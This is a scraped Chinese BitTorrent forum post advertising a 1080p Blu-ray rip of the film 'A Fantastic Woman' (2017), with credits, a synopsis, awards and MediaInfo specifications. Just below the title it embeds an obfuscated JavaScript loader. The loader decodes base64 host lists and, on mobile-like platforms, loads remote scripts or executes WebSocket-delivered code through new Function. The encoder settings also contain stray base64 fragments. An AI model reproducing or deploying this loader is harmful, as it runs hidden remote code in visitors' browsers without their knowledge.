普通女人[中文字幕]迅雷下载.A.Fantastic.Woman.2017.1080p.BluRay.x264.DTS 10.80GB

版主小s 29天前 444

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 普通女人 / A Fantastic Woman / 不思议女人(台) / 奇妙女人 / 好女人 / 神奇女郎(港)

◎片 名 Una mujer fantástica

◎年 代 2017

◎产 地 智利 / 德国 / 西班牙 / 美国

◎类 别 剧情 / 同性

◎语 言 西班牙语

◎上映日期 2017-02-12(柏林电影节) / 2017-04-06(智利)

◎IMDb评分 7.2/10 from 22418 users

◎IMDb链接 https://www.imdb.com/title/tt5639354

◎豆瓣评分 7.3/10 from 11286 users

◎豆瓣链接 https://movie.douban.com/subject/26627754/

◎片 长 104分钟

◎导 演 塞巴斯蒂安·莱里奥 Sebastián Lelio

◎编 剧 塞巴斯蒂安·莱里奥 Sebastián Lelio / 刚扎洛·玛萨 Gonzalo Maza

◎主 演 丹妮拉·维加 Daniela Vega

弗朗西斯科·雷耶斯 Francisco Reyes

路易斯·尼科 Luis Gnecco

艾琳·库彭海姆 Aline Küppenheim

尼古拉斯·萨维德拉 Nicolás Saavedra

安帕罗·诺格拉 Amparo Noguera

特丽妮达·冈萨雷斯 Trinidad González

内斯托尔·坎蒂利亚纳 Néstor Cantillana

亚历山德罗·高克 Alejandro Goic

安东尼娅·泽格斯 Antonia Zegers

塞尔吉奥·埃尔南德斯 Sergio Hernández

罗伯托·法里亚斯 Roberto Farias

克里斯蒂安·查帕罗 Cristián Chaparro

戴安娜·卡西斯 Diana Cassis

爱德华多·帕谢罗 Eduardo Paxeco

法比奥拉·萨莫拉 Fabiola Zamora

马尔西亚·塔格莱 Marcial Tagle

◎标 签 LGBT | 智利 | 跨性别 | 西班牙 | 2017 | 女性 | 剧情 | 柏林电影节

◎简 介

玛莲娜(丹妮耶拉维加 饰演)与奥兰多(弗朗西斯科雷耶斯 饰演)真心相爱,两人正著手规划著未来。玛莲娜是一位年轻的餐厅服务员,也是位有抱负的女歌手。奥兰多比她大20岁,拥有一家纺织公司。在庆祝玛莲娜生日的夜晚,奥兰多身体感到不适,当他抵达医院经急救后,仍宣告不治。突如其来的噩耗,让玛莲娜被医生和奥兰多的家人怀疑,让她不能够以伴侣的身分哀悼奥兰多。玛莲娜也因此被女侦探调查是否与奥兰多的死亡有关,奥兰多的前妻禁止她参加葬礼,奥兰多的儿子更是威胁玛莲娜搬离与奥兰多同居的公寓。玛莲娜,一个跨性别者女性,对于奥兰多的家庭而言,她是畸变且歪曲的。玛莲娜决定用她奋斗一生的力量,争取自己与爱人告别的权利,只为了符合现在的自己-一个複杂、强大、直率、梦幻般的女人。

◎获奖情况

第90届奥斯卡金像奖(2018)

最佳外语片 塞巴斯蒂安·莱里奥

第67届柏林国际电影节(2017)

金熊奖 最佳影片(提名) 塞巴斯蒂安·莱里奥

银熊奖 最佳剧本 刚扎洛·玛萨 / 塞巴斯蒂安·莱里奥

泰迪熊奖 最佳电影 塞巴斯蒂安·莱里奥

第75届金球奖(2018)

电影类 最佳外语片(提名)

第32届西班牙戈雅奖(2018)

最佳伊比利亚美洲电影

第65届圣塞巴斯蒂安国际电影节(2017)

地平线大奖(提名) 塞巴斯蒂安·莱里奥

第89届美国国家评论协会奖(2017)

五佳外语片

第23届美国评论家选择电影奖(2018)

最佳外语片(提名)

第33届美国独立精神奖(2018)

最佳国际电影

第39届伦敦影评人协会奖(2019)

年度外语片(提名)

第30届芝加哥影评人协会奖(2017)

最佳外语片(提名)

  1. General

  2. Unique ID : 263749425523148839923774845924392743962 (0xC66C4AA91D8B68BC26F740E1BF02B41A)

  3. Complete name : A.Fantastic.Woman.2017.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.8 GiB

  7. Duration : 1 h 44 min

  8. Overall bit rate : 14.9 Mb/s

  9. Encoded date : UTC 2021-07-03 06:25:46

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 44 min

  22. Bit rate : 13.3 Mb/s

  23. Width : 1 920 pixels

  24. Height : 804 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.360

  33. Stream size : 9.69 GiB (90%)

  34. Writing library : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=4 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=8 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.3000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : Spanish

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 44 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.10 GiB (10%)

  54. Language : Spanish

  55. Default : Yes

  56. Forced : No


  57. Text #1

  58. ID : 3

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 33 min

  64. Bit rate : 10.9 kb/s

  65. Count of elements : 1548

  66. Stream size : 7.27 MiB (0%)

  67. Title : chs

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No


  71. Text #2

  72. ID : 4

  73. Format : PGS

  74. Muxing mode : zlib

  75. Codec ID : S_HDMV/PGS

  76. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  77. Duration : 1 h 33 min

  78. Bit rate : 11.1 kb/s

  79. Count of elements : 1548

  80. Stream size : 7.40 MiB (0%)

  81. Title : cht

  82. Language : Chinese

  83. Default : No

  84. Forced : No


  85. Text #3

  86. ID : 5

  87. Format : PGS

  88. Muxing mode : zlib

  89. Codec ID : S_HDMV/PGS

  90. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  91. Duration : 1 h 43 min

  92. Bit rate : 21.4 kb/s

  93. Count of elements : 2078

  94. Stream size : 15.9 MiB (0%)

  95. Title : eng

  96. Language : English

  97. Default : No

  98. Forced : No


  99. Menu

  100. 00:00:00.000 : 第 01 章

  101. 00:06:52.745 : 第 02 章

  102. 00:11:56.674 : 第 03 章

  103. 00:19:38.927 : 第 04 章

  104. 00:25:01.917 : 第 05 章

  105. 00:32:17.435 : 第 06 章

  106. 00:36:40.364 : 第 07 章

  107. 00:44:39.802 : 第 08 章

  108. 00:57:04.546 : 第 09 章

  109. 01:01:29.435 : 第 10 章

  110. 01:10:48.077 : 第 11 章

  111. 01:16:03.475 : 第 12 章

  112. 01:21:02.774 : 第 13 章

  113. 01:25:54.983 : 第 14 章

  114. 01:33:42.491 : 第 15 章

  115. 01:35:33.894 : 第 16 章



此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情 同性

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回